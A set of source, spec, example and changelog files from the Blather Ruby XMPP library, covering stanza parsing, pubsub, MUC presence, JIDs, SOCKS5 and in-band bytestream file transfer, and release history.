expect(s.role).to eq(:participant)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::C.registered_name.to_sym)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Status.registered_name.to_sym)
end
it "handle stanzas with nested elements that don't have a decorator module or are not stanzas" do
string = <<-XML
<presence from="<EMAIL>.net/GMX MultiMessenger" to="<EMAIL>/480E24CF" lang="de">
<show>away</show>
<priority>0</priority>
<nick xmlns="http://jabber.org/protocol/nick">Me</nick>
<x xmlns="jabber:x:data" type="submit">
<field var="FORM_TYPE" type="hidden">
<value>http://jabber.org/protocol/profile</value>
</field>
<field var="x-sip_capabilities" type="text-single">
<value>19</value>
</field>
</x>
<x xmlns="vcard-temp:x:update">
<photo/>
</x>
<ignore xmlns="http://gmx.net/protocol/gateway"/>
<delay xmlns="urn:xmpp:delay" from="<EMAIL>/GMX MultiMessenger" stamp="2013-08-26T22:18:41Z"/>
<x xmlns="jabber:x:delay" stamp="20130826T22:18:41"/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_a Blather::Stanza::Presence
end
end
<file_sep>/spec/blather/xmpp_node_spec.rb
require 'spec_helper'
# Specs for Blather::XMPPNode: the registration machinery that maps an
# element name + namespace pair onto a stanza subclass, plus import/parse.
describe Blather::XMPPNode do
before { @doc = Nokogiri::XML::Document.new }
it 'generates a node based on the registered_name' do
foo = Class.new(Blather::XMPPNode)
foo.registered_name = 'foo'
expect(foo.new.element_name).to eq('foo')
end
it 'sets the namespace on creation' do
foo = Class.new(Blather::XMPPNode)
foo.registered_ns = 'foo'
expect(foo.new('foo').namespace.href).to eq('foo')
end
# register both records name/ns on the class and adds it to the global registry.
it 'registers sub classes' do
class RegistersSubClass < Blather::XMPPNode; register 'foo', 'foo:bar'; end
expect(RegistersSubClass.registered_name).to eq('foo')
expect(RegistersSubClass.registered_ns).to eq('foo:bar')
expect(Blather::XMPPNode.class_from_registration('foo', 'foo:bar')).to eq(RegistersSubClass)
end
# import wraps an arbitrary Nokogiri node in the matching registered class.
it 'imports another node' do
class ImportSubClass < Blather::XMPPNode; register 'foo', 'foo:bar'; end
n = Blather::XMPPNode.new('foo')
n.namespace = 'foo:bar'
expect(Blather::XMPPNode.import(n)).to be_kind_of ImportSubClass
end
it 'can convert itself into a stanza' do
class StanzaConvert < Blather::XMPPNode; register 'foo'; end
n = Blather::XMPPNode.new('foo')
expect(n.to_stanza).to be_kind_of StanzaConvert
end
it 'can parse a string and import it' do
class StanzaParse < Blather::XMPPNode; register 'foo'; end
string = '<foo/>'
n = Nokogiri::XML(string).root
i = Blather::XMPPNode.import n
expect(i).to be_kind_of StanzaParse
p = Blather::XMPPNode.parse string
expect(p).to be_kind_of StanzaParse
end
end
<file_sep>/spec/blather/stanza/pubsub/publish_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
# Specs for Blather::Stanza::PubSub::Publish (XEP-0060 item publication):
# node creation, defaults, item iteration, and the three payload forms
# (Hash of id => payload, Array of payloads, single String payload).
describe Blather::Stanza::PubSub::Publish do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:publish, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Publish)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(publish_xml)).to be_instance_of Blather::Stanza::PubSub::Publish
end
it 'ensures an publish node is present on create' do
publish = Blather::Stanza::PubSub::Publish.new
expect(publish.find('//ns:pubsub/ns:publish', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
# #publish is find-or-create: it must rebuild the node after removal.
it 'ensures an publish node exists when calling #publish' do
publish = Blather::Stanza::PubSub::Publish.new
publish.pubsub.remove_children :publish
expect(publish.find('//ns:pubsub/ns:publish', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(publish.publish).not_to be_nil
expect(publish.find('//ns:pubsub/ns:publish', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
publish = Blather::Stanza::PubSub::Publish.new
expect(publish.type).to eq(:set)
end
it 'sets the host if requested' do
publish = Blather::Stanza::PubSub::Publish.new 'pubsub.jabber.local'
expect(publish.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
publish = Blather::Stanza::PubSub::Publish.new 'host', 'node-name'
expect(publish.node).to eq('node-name')
end
# The fixture publish_xml contains exactly one item.
it 'will iterate over each item' do
publish = Blather::Stanza::PubSub::Publish.new.inherit parse_stanza(publish_xml).root
count = 0
publish.each do |i|
expect(i).to be_instance_of Blather::Stanza::PubSub::PubSubItem
count += 1
end
expect(count).to eq(1)
end
it 'has a node attribute' do
publish = Blather::Stanza::PubSub::Publish.new
expect(publish).to respond_to :node
expect(publish.node).to be_nil
publish.node = 'node-name'
expect(publish.node).to eq('node-name')
expect(publish.xpath('//ns:publish[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
# Hash payloads become <item id="..."> children keyed by the hash keys.
it 'can set the payload with a hash' do
payload = {'id1' => 'payload1', 'id2' => 'payload2'}
publish = Blather::Stanza::PubSub::Publish.new
publish.payload = payload
expect(publish.size).to eq(2)
expect(publish.xpath('/iq/ns:pubsub/ns:publish[ns:item[@id="id1" and .="payload1"] and ns:item[@id="id2" and .="payload2"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the payload with an array' do
payload = %w[payload1 payload2]
publish = Blather::Stanza::PubSub::Publish.new
publish.payload = payload
expect(publish.size).to eq(2)
expect(publish.xpath('/iq/ns:pubsub/ns:publish[ns:item[.="payload1"] and ns:item[.="payload2"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the payload with a string' do
publish = Blather::Stanza::PubSub::Publish.new
publish.payload = 'payload'
expect(publish.size).to eq(1)
expect(publish.xpath('/iq/ns:pubsub/ns:publish[ns:item[.="payload"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
end
<file_sep>/examples/trusted_echo.rb
#!/usr/bin/env ruby
# Echo-bot example using a certificate-verified ("trusted") connection:
# the final "./certs" argument to setup enables server cert verification.
require 'rubygems'
require 'blather/client'
setup '<EMAIL>', 'test', 'vines.local', 5222, "./certs"
when_ready { puts "Connected ! send messages to #{jid.stripped}." }
# Automatically approve any incoming subscription request.
subscription :request? do |s|
write_to_stream s.approve!
end
# A chat message with body 'exit' shuts the client down; this handler is
# registered first so it takes precedence over the generic echo below.
message :chat?, :body => 'exit' do |m|
say m.from, 'Exiting ...'
shutdown
end
# Echo any other chat message back to its sender.
message :chat?, :body do |m|
say m.from, "You sent: #{m.body}"
end
<file_sep>/lib/blather/stanza/iq/s5b.rb
module Blather
class Stanza
class Iq
# # SOCKS5 Bytestreams Stanza
#
# [XEP-0065: SOCKS5 Bytestreams](http://xmpp.org/extensions/xep-0065.html)
#
# @handler :s5b_open
class S5b < Query
# @private
NS_S5B = 'http://jabber.org/protocol/bytestreams'
register :s5b_open, :query, NS_S5B
# Overrides the parent method to remove query node
#
# A bare result IQ (no <query/>) acknowledges the bytestream request.
#
# @see Blather::Stanza#reply
def reply
reply = super
reply.remove_children :query
reply
end
# Get the sid of the file transfer
#
# @return [String]
def sid
query['sid']
end
# Get the used streamhost
#
# NOTE(review): if no <streamhost-used/> child exists, find_first returns
# nil and StreamHostUsed.new(nil) yields a node with a nil jid — confirm
# callers expect that rather than nil.
#
# @return [S5b::StreamHostUsed]
def streamhost_used
StreamHostUsed.new query.find_first('.//ns:streamhost-used', :ns => self.class.registered_ns)
end
# Set the used streamhost
#
# Any existing <streamhost-used/> children are removed first.
#
# @param [Blather::JID, String, nil] jid the jid of the used streamhost
def streamhost_used=(jid)
query.find('.//ns:streamhost-used', :ns => self.class.registered_ns).remove
if jid
query << StreamHostUsed.new(jid)
end
end
# Get the streamhosts
#
# @return [Array<S5b::StreamHost>]
def streamhosts
query.find('.//ns:streamhost', :ns => self.class.registered_ns).map do |s|
StreamHost.new s
end
end
# Set the streamhosts
#
# Replaces all existing <streamhost/> children. Accepts a single
# streamhost or an array; each entry is passed directly to StreamHost.new.
#
# @param streamhosts the array of streamhosts, passed directly to StreamHost.new
def streamhosts=(streamhosts)
query.find('.//ns:streamhost', :ns => self.class.registered_ns).remove
if streamhosts
[streamhosts].flatten.each { |s| self.query << StreamHost.new(s) }
end
end
# StreamHost Stanza
class StreamHost < XMPPNode
register 'streamhost', NS_S5B
# Create a new S5b::StreamHost
#
# @overload new(node)
# Create a new StreamHost by inheriting an existing node
# @param [XML::Node] node an XML::Node to inherit from
# @overload new(opts)
# Create a new StreamHost through a hash of options
# @param [Hash] opts a hash options
# @option opts [Blather::JID, String] :jid the JID of the StreamHost
# @option opts [#to_s] :host the host of the StreamHost
# @option opts [#to_s] :port the port of the StreamHost
# @overload new(jid, host = nil, port = nil)
# Create a new StreamHost
# @param [Blather::JID, String] jid the JID of the StreamHost
# @param [#to_s] host the host of the StreamHost
# @param [#to_s] port the port of the StreamHost
def self.new(jid, host = nil, port = nil)
new_node = super 'streamhost'
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
new_node.host = jid[:host]
new_node.port = jid[:port]
else
new_node.jid = jid
new_node.host = host
new_node.port = port
end
new_node
end
# Get the jid of the streamhost
#
# @return [Blather::JID, nil]
def jid
if j = read_attr(:jid)
JID.new(j)
else
nil
end
end
# Set the jid of the streamhost
#
# @param [Blather::JID, String, nil]
def jid=(j)
write_attr :jid, (j ? j.to_s : nil)
end
# Get the host address of the streamhost
#
# @return [String, nil]
def host
read_attr :host
end
# Set the host address of the streamhost
#
# @param [String, nil]
def host=(h)
write_attr :host, h
end
# Get the port of the streamhost
#
# @return [Fixnum, nil]
def port
if p = read_attr(:port)
p.to_i
else
nil
end
end
# Set the port of the streamhost
#
# @param [String, Fixnum, nil]
def port=(p)
write_attr :port, p
end
end
# Stream host used stanza
class StreamHostUsed < XMPPNode
register 'streamhost-used', NS_S5B
# Create a new S5b::StreamHostUsed
#
# @overload new(node)
# Create a new StreamHostUsed by inheriting an existing node
# @param [XML::Node] node an XML::Node to inherit from
# @overload new(opts)
# Create a new StreamHostUsed through a hash of options
# @param [Hash] opts a hash options
# @option opts [Blather::JID, String] :jid the JID of the StreamHostUsed
# @overload new(jid)
# Create a new StreamHostUsed
# @param [Blather::JID, String] jid the JID of the StreamHostUsed
def self.new(jid)
new_node = super 'streamhost-used'
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
else
new_node.jid = jid
end
new_node
end
# Get the jid of the used streamhost
#
# @return [Blather::JID, nil]
def jid
if j = read_attr(:jid)
JID.new(j)
else
nil
end
end
# Set the jid of the used streamhost
#
# @param [Blather::JID, String, nil]
def jid=(j)
write_attr :jid, (j ? j.to_s : nil)
end
end
end
end
end
end
<file_sep>/lib/blather/stanza/disco/disco_items.rb
module Blather
class Stanza
# # DiscoItems Stanza
#
# [XEP-0030 Disco Items](http://xmpp.org/extensions/xep-0030.html#items)
#
# Disco Items node that provides or retrieves items associated with a
# Jabber entity
#
# @handler :disco_items
class DiscoItems < Disco
register :disco_items, nil, 'http://jabber.org/protocol/disco#items'
# Create a new DiscoItems node
#
# @param [#to_s] type the IQ type
# @param [#to_s] node the node the items are associated with
# @param [Array<Blather::XMPPNode>] items an array of Disco::Items
# @return [Blather::Stanza::DiscoItems]
def self.new(type = nil, node = nil, items = [])
new_node = super type
new_node.node = node
new_node.items = [items]
new_node
end
# Set of items associated with the node
#
# NOTE(review): the '//ns:item' XPath is document-wide rather than scoped
# to this query — confirm no other ns:item elements can appear elsewhere.
#
# @return [Array<Blather::Stanza::DiscoItems::Item>]
def items
query.find('//ns:item', :ns => self.class.registered_ns).map do |i|
Item.new i
end
end
# Add an array of items
#
# Replaces all existing items; each entry is passed directly to Item.new.
#
# @param items the array of items, passed directly to Item.new
def items=(items)
query.find('//ns:item', :ns => self.class.registered_ns).each &:remove
if items
[items].flatten.each { |i| self.query << Item.new(i) }
end
end
# An individual Disco Item
class Item < XMPPNode
# Create a new Blather::Stanza::DiscoItems::Item
#
# @overload new(node)
# Create a new Item by inheriting an existing node
# @param [XML::Node] node an XML::Node to inherit from
# @overload new(opts)
# Create a new Item through a hash of options
# @param [Hash] opts a hash options
# @option opts [Blather::JID, String] :jid the JID to attach to the item
# @option opts [#to_s] :node the node the item is attached to
# @option opts [#to_s] :name the name of the Item
# @overload new(jid, node = nil, name = nil)
# Create a new Item
# @param [Blather::JID, String] jid the JID to attach to the item
# @param [#to_s] node the node the item is attached to
# @param [#to_s] name the name of the Item
def self.new(jid, node = nil, name = nil)
# Passing an existing Item through returns it unchanged.
return jid if jid.class == self
new_node = super :item
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
new_node.node = jid[:node]
new_node.name = jid[:name]
else
new_node.jid = jid
new_node.node = node
new_node.name = name
end
new_node
end
# Get the JID attached to the node
#
# @return [Blather::JID, nil]
def jid
(j = self[:jid]) ? JID.new(j) : nil
end
# Set the JID of the node
#
# @param [Blather::JID, String, nil] jid the new JID
def jid=(jid)
write_attr :jid, jid
end
# Get the name of the node
#
# @return [String, nil]
def node
read_attr :node
end
# Set the name of the node
#
# @param [String, nil] node the new node name
def node=(node)
write_attr :node, node
end
# Get the Item name
#
# @return [String, nil]
def name
read_attr :name
end
# Set the Item name
#
# @param [#to_s] name the Item name
def name=(name)
write_attr :name, name
end
# Compare two DiscoItems::Item objects by jid, node and name
# @param [DiscoItems::Item] o the Item object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:jid, :node, :name])
end
end
end
end #Stanza
end #Blather
<file_sep>/spec/blather/stanza/presence/muc_user_spec.rb
require 'spec_helper'
# Fixture: a MUC#user presence (XEP-0045) with item, status codes and password.
def muc_user_xml
<<-XML
<presence from='<EMAIL>/pda'
id='n13mt3l'
to='<EMAIL>/thirdwitch'>
<x xmlns='http://jabber.org/protocol/muc#user'>
<item affiliation='none'
jid='hag66@shakespeare.lit/pda'
role='participant'/>
<status code='100'/>
<status code='110'/>
<password><PASSWORD></password>
</x>
</presence>
XML
end
# Specs for the MUCUser presence decorator: import, <x/> element lifecycle,
# and accessors for affiliation, role, jid, status codes and password.
describe 'Blather::Stanza::Presence::MUCUser' do
it 'must be importable' do
muc_user = Blather::XMPPNode.parse(muc_user_xml)
expect(muc_user).to be_kind_of Blather::Stanza::Presence::MUCUser::InstanceMethods
expect(muc_user.affiliation).to eq(:none)
expect(muc_user.jid).to eq('hag66@shakespeare.lit/pda')
expect(muc_user.role).to eq(:participant)
expect(muc_user.status_codes).to eq([100, 110])
expect(muc_user.password).to eq('<PASSWORD>')
end
it 'ensures a form node is present on create' do
c = Blather::Stanza::Presence::MUCUser.new
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUCUser.registered_ns)).not_to be_empty
end
# #muc_user is find-or-create: it must rebuild the <x/> child after removal.
it 'ensures a form node exists when calling #muc' do
c = Blather::Stanza::Presence::MUCUser.new
c.remove_children :x
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUCUser.registered_ns)).to be_empty
expect(c.muc_user).not_to be_nil
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUCUser.registered_ns)).not_to be_empty
end
it "must be able to set the affiliation" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.affiliation).to eq(nil)
muc_user.affiliation = :none
expect(muc_user.affiliation).to eq(:none)
end
it "must be able to set the role" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.role).to eq(nil)
muc_user.role = :participant
expect(muc_user.role).to eq(:participant)
end
it "must be able to set the jid" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.jid).to eq(nil)
muc_user.jid = '<EMAIL>'
expect(muc_user.jid).to eq('<EMAIL>')
end
# Assigning status codes replaces the previous set rather than appending.
it "must be able to set the status codes" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.status_codes).to eq([])
muc_user.status_codes = [100, 110]
expect(muc_user.status_codes).to eq([100, 110])
muc_user.status_codes = [500]
expect(muc_user.status_codes).to eq([500])
end
it "must be able to set the password" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.password).to eq(nil)
muc_user.password = '<PASSWORD>'
expect(muc_user.password).to eq('<PASSWORD>')
muc_user.password = '<PASSWORD>'
expect(muc_user.password).to eq('<PASSWORD>')
end
end
<file_sep>/spec/blather/jid_spec.rb
require 'spec_helper'
# Specs for Blather::JID: construction from parts or strings, RFC 6122
# length limits, comparison/equality, and resource stripping.
describe Blather::JID do
it 'does nothing if created from Blather::JID' do
jid = Blather::JID.new 'n@d/r'
expect(Blather::JID.new(jid).object_id).to eq(jid.object_id)
end
it 'creates a new Blather::JID from (n,d,r)' do
jid = Blather::JID.new('n', 'd', 'r')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
expect(jid.resource).to eq('r')
end
it 'creates a new Blather::JID from (n,d)' do
jid = Blather::JID.new('n', 'd')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
end
it 'creates a new Blather::JID from (n@d)' do
jid = Blather::JID.new('n@d')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
end
it 'creates a new Blather::JID from (n@d/r)' do
jid = Blather::JID.new('n@d/r')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
expect(jid.resource).to eq('r')
end
it 'requires at least a node' do
expect { Blather::JID.new }.to raise_error ::ArgumentError
end
# Each JID part is limited to 1023 bytes per RFC 6122.
it 'ensures length of node is no more than 1023 characters' do
expect { Blather::JID.new('n'*1024) }.to raise_error Blather::ArgumentError
end
it 'ensures length of domain is no more than 1023 characters' do
expect { Blather::JID.new('n', 'd'*1024) }.to raise_error Blather::ArgumentError
end
it 'ensures length of resource is no more than 1023 characters' do
expect { Blather::JID.new('n', 'd', 'r'*1024) }.to raise_error Blather::ArgumentError
end
it 'compares Blather::JIDs' do
expect(Blather::JID.new('a@b/c') <=> Blather::JID.new('d@e/f')).to eq(-1)
expect(Blather::JID.new('a@b/c') <=> Blather::JID.new('a@b/c')).to eq(0)
expect(Blather::JID.new('d@e/f') <=> Blather::JID.new('a@b/c')).to eq(1)
end
it 'checks for equality' do
expect(Blather::JID.new('n@d/r') == Blather::JID.new('n@d/r')).to eq(true)
expect(Blather::JID.new('n@d/r').eql?(Blather::JID.new('n@d/r'))).to eq(true)
end
# #stripped returns a resource-less copy, leaving the receiver untouched.
it 'will strip' do
jid = Blather::JID.new('n@d/r')
expect(jid.stripped).to eq(Blather::JID.new('n@d'))
expect(jid).to eq(Blather::JID.new('n@d/r'))
end
# #strip! removes the resource in place.
it 'will strip itself' do
jid = Blather::JID.new('n@d/r')
jid.strip!
expect(jid).to eq(Blather::JID.new('n@d'))
end
it 'has a string representation' do
expect(Blather::JID.new('n@d/r').to_s).to eq('n@d/r')
expect(Blather::JID.new('n', 'd', 'r').to_s).to eq('n@d/r')
expect(Blather::JID.new('n', 'd').to_s).to eq('n@d')
end
it 'provides a #stripped? helper' do
jid = Blather::JID.new 'a@b/c'
expect(jid).to respond_to :stripped?
expect(jid.stripped?).not_to equal true
jid.strip!
expect(jid.stripped?).to eq(true)
end
end
<file_sep>/spec/blather/stanza/pubsub/affiliations_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
# Expected affiliation map matching the affiliations_xml fixture:
# XEP-0060 affiliation type => list of node names.
def control_affiliations
{ :owner => ['node1', 'node2'],
:publisher => ['node3'],
:outcast => ['node4'],
:member => ['node5'],
:none => ['node6'] }
end
# Specs for Blather::Stanza::PubSub::Affiliations: registration, import,
# the <affiliations/> element lifecycle, defaults and iteration.
describe Blather::Stanza::PubSub::Affiliations do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:affiliations, Blather::Stanza::PubSub.registered_ns)).to eq(Blather::Stanza::PubSub::Affiliations)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(affiliations_xml)).to be_instance_of Blather::Stanza::PubSub::Affiliations
end
it 'ensures an affiliations node is present on create' do
affiliations = Blather::Stanza::PubSub::Affiliations.new
expect(affiliations.find_first('//ns:affiliations', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
end
# #affiliations is find-or-create: it must rebuild the node after removal.
it 'ensures an affiliations node exists when calling #affiliations' do
affiliations = Blather::Stanza::PubSub::Affiliations.new
affiliations.pubsub.remove_children :affiliations
expect(affiliations.find_first('//ns:affiliations', :ns => Blather::Stanza::PubSub.registered_ns)).to be_nil
expect(affiliations.affiliations).not_to be_nil
expect(affiliations.find_first('//ns:affiliations', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
end
it 'defaults to a get node' do
expect(Blather::Stanza::PubSub::Affiliations.new.type).to eq(:get)
end
it 'sets the host if requested' do
aff = Blather::Stanza::PubSub::Affiliations.new :get, 'pubsub.jabber.local'
expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'can import an affiliates result node' do
node = parse_stanza(affiliations_xml).root
affiliations = Blather::Stanza::PubSub::Affiliations.new.inherit node
expect(affiliations.size).to eq(5)
expect(affiliations.list).to eq(control_affiliations)
end
# #each yields [affiliation_type, node_names] pairs.
it 'will iterate over each affiliation' do
Blather::XMPPNode.parse(affiliations_xml).each do |type, nodes|
expect(nodes).to eq(control_affiliations[type])
end
end
end
<file_sep>/lib/blather/file_transfer/ibb.rb
require "base64"
module Blather
class FileTransfer
# In-Band Bytestreams (XEP-0047) transfer helper.
# Takes care of accepting, declining and offering file transfers through the stream
class Ibb
# @param [Blather::Stream] stream the stream the transfer runs over
# @param [Blather::Stanza] iq the <open/> IQ that initiated the transfer
def initialize(stream, iq)
@stream = stream
@iq = iq
# Expected sequence number of the next data chunk (XEP-0047 'seq').
@seq = 0
end
# Accept an incoming file-transfer
#
# Pipes decoded chunk data into an EventMachine handler, acknowledges each
# in-order chunk, and tears down all handlers when the sender closes.
#
# @param [module] handler the handler for incoming data, see Blather::FileTransfer::SimpleFileReceiver for an example
# @param [Array] params the params to be passed into the handler
def accept(handler, *params)
@io_read, @io_write = IO.pipe
EM::attach @io_read, handler, *params
@stream.register_handler :ibb_data, :from => @iq.from, :sid => @iq.sid do |iq|
if iq.data['seq'] == @seq.to_s
begin
@io_write << Base64.decode64(iq.data.content)
@stream.write iq.reply
@seq += 1
# seq is a 16-bit counter and wraps back to 0 after 65535 (XEP-0047).
@seq = 0 if @seq > 65535
rescue Errno::EPIPE
# The reading end of the pipe is gone; cancel the transfer.
@stream.write StanzaError.new(iq, 'not-acceptable', :cancel).to_node
end
else
# Out-of-sequence chunk: tell the sender to retry (:wait).
@stream.write StanzaError.new(iq, 'unexpected-request', :wait).to_node
end
true
end
@stream.register_handler :ibb_close, :from => @iq.from, :sid => @iq.sid do |iq|
@stream.write iq.reply
@stream.clear_handlers :ibb_data, :from => @iq.from, :sid => @iq.sid
@stream.clear_handlers :ibb_close, :from => @iq.from, :sid => @iq.sid
@io_write.close
true
end
@stream.clear_handlers :ibb_open, :from => @iq.from
@stream.clear_handlers :ibb_open, :from => @iq.from, :sid => @iq.sid
# Acknowledging the original <open/> IQ starts the transfer.
@stream.write @iq.reply
end
# Decline an incoming file-transfer
#
# Clears all handlers for this session and answers with not-acceptable.
def decline
@stream.clear_handlers :ibb_open, :from => @iq.from
@stream.clear_handlers :ibb_data, :from => @iq.from, :sid => @iq.sid
@stream.clear_handlers :ibb_close, :from => @iq.from, :sid => @iq.sid
@stream.write StanzaError.new(@iq, 'not-acceptable', :cancel).to_node
end
# Offer a file to somebody, not implemented yet
def offer
# TODO: implement
end
end
end
end
<file_sep>/CHANGELOG.md
# [develop](https://github.com/adhearsion/blather/compare/master...develop)
* No default [chat state](https://xmpp.org/extensions/xep-0085.html) on new messages, if you want one you need to set it. Blather version 2.0 and prior set this value to `active`
* jabber:client and jabber:component:accept namespaces are no longer erased when parsing, so if you manually select nodes assuming there will be no namespace for these, you need to update
* Breaking change (for release in v3.0.0): Falsy handler return value no longer causes passing to the next handler. Use `pass` explicitly for that.
* Breaking change (for release in v3.0.0): Blather::Client uses EM.defer instead of sucker_punch for threadpool, or else no threads when passed async: true
* Bugfix: Blather::Stanza::X#find_or_create only looks at immediate children of parent now
* Feature: Blather::Stanza::X::Field values can be arrays to support multiple-valued fields
* Feature: Add Blather::Stanza::Iq::IBR to implement XEP-0077 In-Band Registration
* Bugfix: Starttls when offered by server; including when the unsecured stream features start with a <method>
* Bugfix: Parser does not drop attribute namespaces
# [v2.0.0](https://github.com/adhearsion/blather/compare/v1.2.0...v2.0.0) - [2018-06-18](https://rubygems.org/gems/blather/versions/2.0.0)
* Bugfix: Require EventMachine >= 1.2.6 to avoid segfault issue
* Bugfix: Fix unsafe threaded use of @tmp_handlers in Blather::Client
* Feature: Bump RSpec to 3.x and convert specs with Transpec
* Feature: Bump Mocha version to 1.x
* Feature: Switch from girl_friday to sucker_punch
* Feature: Unlock Nokogiri to allow >=1.8.3 now that issues are fixed upstream
# [v1.2.0](https://github.com/adhearsion/blather/compare/v1.1.4...v1.2.0) - [2016-01-07](https://rubygems.org/gems/blather/versions/1.2.0)
* Bugfix: Properly sort resources with the same priority but different status
* Bugfix: Lock to Nokogiri <= 1.6.1 because new versions are more broken than old ones
* Bugfix: Avoid repeatedly parsing nodes which are already parsed
* Feature: Implement Blather::Roster#version, which returns version of last processed roster stanza
# [v1.1.4](https://github.com/adhearsion/blather/compare/v1.1.4...v1.1.4) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.4)
* Bugfix: Typo in passing through connection options
* Today was a very dark day. I am ashamed of myself.
# [v1.1.3](https://github.com/adhearsion/blather/compare/v1.1.2...v1.1.3) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.3)
* Bugfix: Expose alternative authentication ID in DSL (correct default)
# [v1.1.2](https://github.com/adhearsion/blather/compare/v1.1.1...v1.1.2) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.2)
* Bugfix: Expose alternative authentication ID in DSL
# [v1.1.1](https://github.com/adhearsion/blather/compare/v1.1.0...v1.1.1) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.1)
* Bugfix: Expose alternative authentication ID when setting up a client
# [v1.1.0](https://github.com/adhearsion/blather/compare/v1.0.0...v1.1.0) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.0)
* Feature: Permit an alternative authentication ID when connecting. Used to support [MojoAuth](http://mojoauth.mojolingo.com/) and similar schemes.
* Bugfix: Allow sending errors to the wire directly with correct formatting (previously raised)
* Bugfix: Don't pass service unavailable response to be processed as roster in client_post_init
# [v1.0.0](https://github.com/adhearsion/blather/compare/v0.8.8...v1.0.0) - [2014-02-10](https://rubygems.org/gems/blather/versions/1.0.0)
* Stable API promise
* Bugfix: Fix the DSL module-extended API that was broken by 8327184acc57c20daeaebb975729ff70207eab67
# [v0.8.8](https://github.com/adhearsion/blather/compare/v0.8.7...v0.8.8) - [2013-09-30](https://rubygems.org/gems/blather/versions/0.8.8)
* Bugfix: Warn about local file transfers being disabled by default
* Bugfix: Ensure that file transfers are accepted instantly. See https://groups.google.com/forum/#!topic/xmpp-blather/LMl6pR9qHfA
# [v0.8.7](https://github.com/adhearsion/blather/compare/v0.8.6...v0.8.7) - [2013-08-26](https://rubygems.org/gems/blather/versions/0.8.7)
* Bugfix: Handle stanzas with nested elements that don't have a decorator module or are not stanzas
* Bugfix: Fix the roster which was broken by the DSL being included in Object
# [v0.8.6](https://github.com/adhearsion/blather/compare/v0.8.5...v0.8.6) - [2013-08-23](https://rubygems.org/gems/blather/versions/0.8.6)
* Bugfix: Ensure that session creation always comes immediately after binding. Fixes incompatibility with ejabberd.
* Bugfix: Close streams on next EM tick to avoid hanging.
* Bugfix: Ensure handler methods are available even when including the DSL in Object
# [v0.8.5](https://github.com/adhearsion/blather/compare/v0.8.4...v0.8.5) - [2013-06-01](https://rubygems.org/gems/blather/versions/0.8.5)
* Bugfix: Ensure that binding is always performed before session creation, regardless of the order of elements in the feature set provided by the server. This was causing incompatibility with Tigase.
# [v0.8.4](https://github.com/adhearsion/blather/compare/v0.8.3...v0.8.4) - [2013-03-20](https://rubygems.org/gems/blather/versions/0.8.4)
* Bugfix: Only finish stream parser if there is one. This prevents crashes on failure to connect.
# [v0.8.3](https://github.com/adhearsion/blather/compare/v0.8.2...v0.8.3) - [2013-03-03](https://rubygems.org/gems/blather/versions/0.8.3)
* Bugfix: Strange issue causing total failure with 0.8.2 - https://github.com/adhearsion/blather/issues/108
# [v0.8.2](https://github.com/adhearsion/blather/compare/v0.8.1...v0.8.2) - [2013-01-02](https://rubygems.org/gems/blather/versions/0.8.2)
* Bugfix: General spec fixes
* Bugfix: Fixes for JRuby and Rubinius
* Bugfix: Ensure parsers are shut down correctly
* Update: Bump Nokogiri (1.5.6) and EventMachine (1.0.0) minimum versions
# [v0.8.1](https://github.com/adhearsion/blather/compare/v0.8.0...v0.8.1) - [2012-09-17](https://rubygems.org/gems/blather/versions/0.8.1)
* Project moved to the Adhearsion Foundation
* Fixes for EventMachine 1.0.x
* Simplify booting client using the DSL in the varying supported modes
* Documentation fixes
# [v0.8.0](https://github.com/adhearsion/blather/compare/v0.7.1...v0.8.0) - [2012-07-09](https://rubygems.org/gems/blather/versions/0.8.0)
* Feature(jmkeys): DSL methods for joining and sending messages to MUC rooms
* Feature(jackhong): Inband registration support
* Bugfix(benlangfeld): Ensure that presence nodes which are both status and subscription may be responded to
* Bugfix(benlangfeld): A whole bunch of JRuby fixes
